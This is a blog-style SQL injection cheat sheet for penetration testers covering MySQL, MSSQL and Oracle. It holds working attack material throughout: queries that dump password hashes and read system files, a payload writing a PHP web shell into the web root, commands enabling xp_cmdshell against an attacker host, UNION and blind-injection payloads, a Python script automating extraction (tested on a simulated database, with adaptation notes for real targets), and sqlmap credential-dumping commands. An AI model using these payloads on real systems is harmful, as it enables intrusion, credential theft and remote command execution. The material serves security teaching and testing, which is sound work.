SQL Injection Cheat Sheet

Sep 9, 2021


Enumeration

Gather the information (version, current user, privileges, other databases, credentials) that lets you move from a limited database account to higher privileges.

MySQL

Information                      SQL Query
Database version                 select @@version
Current database                 select database()
Other database names             select schema_name from information_schema.schemata
Database user                    select user()
                                 select system_user()
Database users, password hashes  select host, user, password from mysql.user
                                 (MySQL 5.7 and later dropped the password column: select host, user, authentication_string from mysql.user)
Table names                      select table_schema, table_name from information_schema.tables
                                 select table_name from information_schema.tables where table_schema='userdb'
Column names                     select table_name, column_name from information_schema.columns
                                 select column_name from information_schema.columns where table_name='usertable'
Read system files                select load_file('/etc/hosts')
Write to file                    select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'
                                 (both file operations need the FILE privilege, and secure_file_priv must permit the target path; the column count must match the injected query)

MSSQL

Information                      SQL Query
Database version                 select @@version;
Current database                 select db_name();
Available database names         select name from master..sysdatabases;
Is the login sysadmin (DBA)      select is_srvrolemember('sysadmin');   -- 1 means yes
Logins, password hashes          select name, password_hash from master.sys.sql_logins;
                                 (needs CONTROL SERVER permission; mysql.user does not exist on MSSQL)
Table names                      select table_schema, table_name from information_schema.tables;
                                 select table_name from information_schema.tables where table_schema='userdb';
Column names                     select table_name, column_name from information_schema.columns;
                                 select column_name from information_schema.columns where table_name='usertable';
xp_cmdshell (needs sysadmin)     EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
                                 EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
                                 EXEC xp_cmdshell 'ping attacker_ip';
                                 (GO is a sqlcmd/SSMS batch separator, not T-SQL; leave it out of injected payloads, which also need stacked queries to be possible)

Oracle

Information                      SQL Query
Database version                 SELECT banner FROM v$version;
                                 SELECT version FROM v$instance;
Current database                 SELECT SYS.DATABASE_NAME FROM DUAL;
                                 SELECT instance_name FROM v$instance;
Schemas (Oracle's equivalent     SELECT DISTINCT owner FROM all_tables;
of other databases)
DBA accounts                     SELECT DISTINCT grantee FROM dba_sys_privs WHERE admin_option = 'YES';
Users, password hashes           SELECT name, password FROM sys.user$;
                                 (needs SYS-level access; on 11g and later the current hash is in the spare4 column of sys.user$)
Table names                      SELECT table_name FROM all_tables;
                                 SELECT table_name FROM all_tables WHERE owner='web_db';
Column names                     SELECT column_name FROM all_tab_columns WHERE table_name = 'users' AND owner='web_db';

Exploitation

Understanding the manual attack is required rather than running a tool blindly. Without it you cannot tell why a tool is failing, and you cannot carry the attack out by hand when a tool is not an option.

MySQL UNION-based manual example

The payloads below go into the vulnerable id parameter. Each step is confirmed by whether the page errors or renders normally.

#Find how many columns the original query returns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 4 #Error, so the query has 3 columns

#Find which column is reflected in the page
id=1 union select 1,2,3 #The number that shows up in the response is the column to put data in
id=1 union select null,null,null #If the first probe errors, start from nulls and swap in a value one position at a time (column types must be compatible)

#Get table names (limited to the current database; without the where clause you also get the MySQL system tables)
id=1 union select 1,table_name,3 from information_schema.tables where table_schema=database()

#Get column names from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents from columns (0x3a is ':', so each row comes back as username:password)
id=1 union select 1,concat(username,0x3a,password),3 from users

Boolean-based blind SQL injection

Nothing from the database is shown in the page; the only signal is whether the page renders normally (condition true) or not (condition false).

#Verify (numeric context; in a string context use id=1' AND '1'='1 so the application's own closing quote completes the payload)
id=1 AND 1=1 #Loads normally
id=1 AND 1=2 #If the site is vulnerable the page will not load normally

#Check whether the first table name in the current database starts with 'a'. If true, the page loads normally; otherwise move on to the next character.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'a'

id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = 'b'

#Most MySQL collations compare strings case-insensitively, so use ASCII() on the character (or BINARY) when case matters; comparing ASCII(...) > n also lets you binary-search each character instead of trying every letter.
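The two manual procedures above (column-count discovery plus UNION extraction, and character-by-character boolean-blind extraction) as one runnable script. This is an added example, not code from the original post: an in-memory SQLite database with a constructed schema stands in for the MySQL backend so it runs offline, `vulnerable_page` simulates the injectable endpoint, and `hardened_page` shows the same query with a bound parameter so you can see every probe fail against it. The table and user names are made up; `sqlite_master`, `pragma_table_info` and `UNICODE(SUBSTR(...))` are SQLite's stand-ins for `information_schema` and `ASCII(SUBSTRING(...))`.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database with a
# made-up schema. SQLite replaces MySQL so the script runs offline;
# sqlite_master and pragma_table_info play the role of information_schema.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
    INSERT INTO products VALUES (1, 'widget', '9.99'), (2, 'gadget', '19.99');
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def vulnerable_page(id_param):
    """The injectable endpoint: the id parameter is concatenated into the query.
    Returns the rows the page would render, or None when the query errors
    (the 'Error' / 'No Error' signal used in the manual steps)."""
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    try:
        return DB.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def hardened_page(id_param):
    """Same query with a bound parameter: whatever is sent is compared as a
    value and never parsed as SQL, so every probe below returns no rows."""
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return DB.execute(sql, (id_param,)).fetchall()


def find_column_count(page, limit=20):
    """ORDER BY n errors as soon as n exceeds the column count."""
    for n in range(1, limit + 1):
        if page(f"1 ORDER BY {n}") is None:
            return n - 1
    return None  # no error at any n: not injectable this way


def union_extract(page, expression, source):
    """UNION SELECT with the reflected (second) column carrying `expression`.
    id=0 matches no real row, so only the injected rows come back."""
    rows = page(f"0 UNION SELECT 1,{expression},3 FROM {source}") or []
    return [row[1] for row in rows]


def blind_extract(page, subquery, max_len=64):
    """Boolean-based blind: recover a scalar subquery's value one character
    at a time using only the true/false page difference. Binary search on
    the character code costs about 7 requests per character instead of up
    to 95 equality tests."""
    baseline = page("1")

    def is_true(cond):
        return page(f"1 AND ({cond})") == baseline

    result = ""
    for pos in range(1, max_len + 1):
        if not is_true(f"LENGTH(({subquery})) >= {pos}"):
            break  # ran past the end of the value
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(f"UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    print("columns:", find_column_count(vulnerable_page))
    print("tables:", union_extract(vulnerable_page, "name", "sqlite_master WHERE type='table'"))
    print("users columns:", union_extract(vulnerable_page, "name", "pragma_table_info('users')"))
    print("dump:", union_extract(vulnerable_page, "username || ':' || password", "users"))
    print("blind:", blind_extract(vulnerable_page, "SELECT password FROM users WHERE username='admin'"))
    print("hardened column count:", find_column_count(hardened_page))
```

Against a real target, replace `vulnerable_page` with a function that sends the HTTP request and returns the response body (or None on an error page); the probing logic does not change. The `||` concatenation and `UNICODE` are SQLite syntax; on MySQL use `concat(username,0x3a,password)` and `ASCII(SUBSTRING(...))` as in the manual payloads.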

SQLMAP

Sqlmap is a popular tool that automates SQL injection detection and exploitation. It covers the common techniques, selected with --technique: boolean-based blind (B), error-based (E), UNION query (U), stacked queries (S), time-based blind (T) and inline queries (Q). It does not find every injection; when it fails, fall back to the manual steps above.

#Capture the request using Burp Suite and save it to a file called post.txt, then get the current database:
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql --current-db

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database --tables

#Find columns
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dbms=mysql -D database -T users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet

Written by
Jobyer Ahmed
Founder and Cybersecurity Professional
Jobyer Ahmed is the founder and cybersecurity professional at Bytium LLC. He works across offensive and defensive security, including penetration testing, red-team operations, and vulnerability management, with a focus on practical and audit-ready security improvements.